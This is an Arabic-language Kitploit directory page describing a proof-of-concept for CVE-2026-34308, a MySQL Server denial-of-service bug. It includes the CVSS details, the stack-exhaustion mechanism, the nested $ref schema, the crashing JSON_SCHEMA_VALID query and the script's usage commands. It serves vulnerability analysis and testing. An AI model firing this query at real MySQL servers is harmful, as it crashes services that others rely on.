Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-34308 — إثبات المفهوم لثغرة CVE-2026-34308، وهي ثغرة رفض خدمة في مكوّن JSON في خادم MySQL. توضّح استنزاف المكدس عبر سلاسل $ref العميقة في الدالة JSON_SCHEMA_VALID()، مما يؤدي إلى تعطّل الخادم. تتضمن سكربت PoC بلغة Python وتحليلًا تقنيًا. | Kitploit
أدوات/GitHubGitHub/joakimbulow/cve-2026-34308
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن قواعد البيانات
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

إثبات المفهوم لثغرة CVE-2026-34308، وهي ثغرة رفض خدمة في مكوّن JSON في خادم MySQL. توضّح استنزاف المكدس عبر سلاسل $ref العميقة في الدالة JSON_SCHEMA_VALID()، مما يؤدي إلى تعطّل الخادم. تتضمن سكربت PoC بلغة Python وتحليلًا تقنيًا.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-34308: خادم MySQL (مكوّن JSON) — رفض الخدمة

النشرة الرسمية للبائع: Oracle Critical Patch Update Advisory — April 2026.

الملخص (من CVE المنشور)

ثغرة أمنية في Oracle MySQL Server (المكوّن: Server: JSON).

الإصدارات المتأثرة المدعومة: 8.0.0–8.0.45، 8.4.0–8.4.8، و9.0.0–9.6.0.

تسمح الثغرة لمستخدم منخفض الامتيازات بتعطيل خادم MySQL (Crash).

درجة CVSS 3.1 الأساسية: 6.5 (تأثيرات على التوافر فقط)
متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


تحليل تقني إضافي (ليس جزءًا من نص CVE)

الآلية المرصودة: استدعاء متكرر عميق (Deep recursion) أثناء قيام MySQL بتقييم JSON_SCHEMA_VALID() مقابل مخطط JSON (JSON Schema) يحتوي على سلسلة خطية طويلة من مؤشرات $ref، دون حد أقصى فعّال للعمق أثناء تجميع/التحقق من المخطط — مما يؤدي إلى استنفاد المكدس (Stack Exhaustion) وتعليق أو تعطل متكرر.

سلسلة الاستدعاء (مفاهيميًا):

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → internal JSON schema validation → repeated $ref resolution
  → stack exhaustion → hang / crash

الامتيازات المطلوبة

لهذا الإثبات المفاهيمي (PoC)، أي حساب MySQL مُصادق عليه يكفي: امنح فقط USAGE على *.* (الحد الأدنى من الامتيازات في MySQL — القدرة على الاتصال — دون SELECT أو وصول للجداول أو أدوار إدارية). إذا كان بإمكان المستخدم فتح جلسة وتنفيذ SELECT JSON_SCHEMA_VALID(...)، فيمكنه تفعيل الحالة.


الإثبات المفاهيمي

سكربت PoC: poc_schema_dos.py

يبني مخطط JSON بسلسلة خطية من $ref (مثال بعمق 1200):

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

يُرسل إلى MySQL كالتالي: SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

في الاختبارات ضد الإصدارات المعرضة للخطر، لوحظ أن هذا يُعطل الخادم خلال حوالي ثانية واحدة (يعتمد التوقيت الدقيق على العتاد، وعلامات البناء، وعمق المخطط).

الاستخدام

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

لاختبار حساب منخفض الامتيازات:

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

ثم: python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (المتجه الرسمي)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N: قابل للوصول عبر الشبكة
  • AC:L: تعقيد الهجوم منخفض
  • PR:L: امتيازات منخفضة مطلوبة
  • UI:N: لا يتطلب تفاعل مستخدم
  • S:U: النطاق غير متغير
  • C:N / I:N: لا تأثير على السرية أو السلامة
  • A:H: تأثير عالٍ على التوافر (تعليق / تعطل متكرر / رفض خدمة)

الملفات

  • poc_schema_dos.py: سكربت الإثبات المفاهيمي
  • README.md: هذا الملف
تنزيل الأداة